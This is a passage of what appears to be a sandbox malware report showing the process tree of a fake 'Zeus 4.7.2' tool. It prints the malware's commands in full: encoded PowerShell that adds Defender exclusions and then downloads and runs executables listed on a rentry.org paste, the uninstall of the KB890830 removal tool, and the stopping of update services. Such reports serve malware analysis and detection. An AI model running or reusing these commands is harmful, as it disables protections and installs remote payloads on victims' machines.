                                                                                                                                                                                                                      PID:2052
                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:5344
                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:2256
                                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:5328
                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:6072
                                                                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                            C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:5472
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1gb24bst.5353.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1gb24bst.5353.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2112
                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:4032
                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZgBoACMAPgA="
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                          PID:2184
                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:5824
                                                                                                                                                                                                                          • C:\Users\Admin\HadesHex-GUI.exe
                                                                                                                                                                                                                            "C:\Users\Admin\HadesHex-GUI.exe"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:5776
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:5864
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                              PID:4912
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                PID:5152
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\tz3apgdt.ib30.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\tz3apgdt.ib30.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:2772
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F48.tmp\7F49.tmp\7F4A.bat C:\Users\Admin\AppData\Roaming\tz3apgdt.ib30.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:3260
                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                      PID:2636
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\tz3apgdt.ib31.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\tz3apgdt.ib31.exe"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5532
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\tz3apgdt.ib32.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\tz3apgdt.ib32.exe"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5476
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\tz3apgdt.ib33.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\tz3apgdt.ib33.exe"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:4232
                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:928
                                                                                                                                                                                                                            • C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                              PID:3776
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZgBoACMAPgA="
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                PID:3332
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                  PID:2400
                                                                                                                                                                                                                              • C:\Users\Admin\HadesHex-GUI.exe
                                                                                                                                                                                                                                "C:\Users\Admin\HadesHex-GUI.exe"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                PID:1864
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:116
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                  PID:4184
                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                    PID:4624
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4ybdohbq.elh0.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4ybdohbq.elh0.exe"
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:5032
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9DEC.tmp\9DED.tmp\9DEE.bat C:\Users\Admin\AppData\Roaming\4ybdohbq.elh0.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:228
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:3100
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\4ybdohbq.elh1.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\4ybdohbq.elh1.exe"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5760
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\4ybdohbq.elh2.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\4ybdohbq.elh2.exe"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:836
                                                                                                                                                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                        PID:2052
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:3620
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:6120
                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                            PID:2348
                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                            PID:1628
                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                            PID:5284
                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:5260
                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                              PID:2468
                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                              PID:5200
                                                                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:4680
                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:4992
                                                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:3912
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4336
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:1632
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:2524
                                                                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:5924
                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:2124
                                                                                                                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:2152
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4ybdohbq.elh3.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4ybdohbq.elh3.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:5584
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:3220
                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:5636
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZgBoACMAPgA="
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                          PID:5676
                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:4744
                                                                                                                                                                                                                                                          • C:\Users\Admin\HadesHex-GUI.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\HadesHex-GUI.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                            PID:4368
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:5640
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                                                                                                                                                                                                                                                              4⤵
